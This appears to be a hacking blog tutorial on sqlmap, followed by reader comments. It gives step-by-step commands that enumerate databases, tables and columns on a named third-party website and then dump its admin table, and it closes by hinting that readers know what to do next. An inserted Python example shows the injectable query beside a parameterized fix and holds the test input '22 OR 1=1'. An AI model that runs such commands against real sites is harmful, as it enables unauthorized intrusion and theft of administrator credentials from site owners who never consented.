Hey all, although I have completed my series on SQL Injection, I would like to tell you all about some tools used for doing SQL Injection. In this tutorial I will be telling you all about my favourite, SQLMAP :) It's an awesome tool.
What is SQLMAP?
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Things you require
1) BackTrack 5
2) A vulnerable website :D
The vulnerable link I am going to use is
First open BackTrack 5 and then open SQLMAP. You can open SQLMAP by doing the following.
Applications-->backtrack-->Exploitation tools-->web exploitation tools-->sqlmap.
It opens your sqlmap console.
Scanning the URL and finding out the database names
Now I am going to scan the URL using the following command.
./sqlmap.py -u http://www.eastodissa.ac.in/news-events.php?id=22 --dbs
Here -u is for URL.
You can also scan the entire website by simply replacing the above URL with the website’s URL.
Now I am going to scan the link.
It has shown me a very good message: “GET parameter 'id' is vulnerable”.
It then asked me whether to continue or stop. As I had already got a vulnerable parameter, I stopped by pressing ‘N’. You can continue the scan if you want.
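What that "GET parameter 'id' is vulnerable" message means on the server side, and how the page's owner closes it, shown as an added example (not code from the original post, the scanned site or sqlmap). The `news` table, its rows and the function names are assumptions, and an in-memory SQLite database stands in for the real one.

```python
import sqlite3

def make_db():
    # Constructed sample data: an in-memory SQLite table standing in for the
    # database behind a news page that takes an ?id= parameter.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?)",
                   [(21, "Sports day"), (22, "Exam schedule"), (23, "Holiday notice")])
    return db

def news_vulnerable(db, raw_id):
    # Weak pattern: the request value is concatenated into the SQL text, so the
    # database parses client input as part of the statement itself.
    return db.execute("SELECT id, title FROM news WHERE id = " + raw_id).fetchall()

def news_hardened(db, raw_id):
    # Check 1: an id is a short run of ASCII digits; reject everything else
    # (the caller would answer HTTP 400 and log the request).
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        raise ValueError("id must be a decimal integer")
    # Check 2: bind the value as a parameter so it can only ever be data.
    return db.execute("SELECT id, title FROM news WHERE id = ?", (int(raw_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for raw in ("22", "22 OR 1=1"):  # constructed inputs: normal id, altered id
        print(repr(raw), "vulnerable ->", news_vulnerable(db, raw))
        try:
            print(repr(raw), "hardened   ->", news_hardened(db, raw))
        except ValueError as exc:
            print(repr(raw), "hardened   -> rejected:", exc)
```

With the concatenated query the altered id returns every row instead of one; with validation plus a bound parameter the same request is rejected before it reaches the database.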
Finding out table names
Aww..!! We got the database names. Now we need to find out the table and column names. As information_schema is for metadata, I am going with the database "nilakantatrust".
The following command gives me the table names.
./sqlmap.py -u http://www.eastodissa.ac.in/news-events.php?id=22 --tables -D nilakantatrust
Here -D is to specify the name of the database.
Finding out column names
Cool.. Now we got 9 tables. As we are always interested in the admin section, let's move on to the est_admin table and find the column names in that table. So we use the following command.
./sqlmap.py -u http://www.eastodissa.ac.in/news-events.php?id=22 --column -T est_admin -D nilakantatrust
Retrieving Data
We got all the columns from the table est_admin. Now we have to retrieve the data from the database. For that we need to write the following command. We are just adding --dump to the above command.
./sqlmap.py -u http://www.eastodissa.ac.in/news-events.php?id=22 --column -T est_admin -D nilakantatrust --dump
We got all the data we want. I hope you know what to do now.
This one helps, I have been doing this hacking manually (waste of time). Time to upgrade, thanks.
Actually, if you are a beginner then first try doing it manually, because it helps you in understanding how and what you actually do while hacking like this :)
Through this you can find new things also.
But if you already understood manual, then yes, for saving time you can try software :)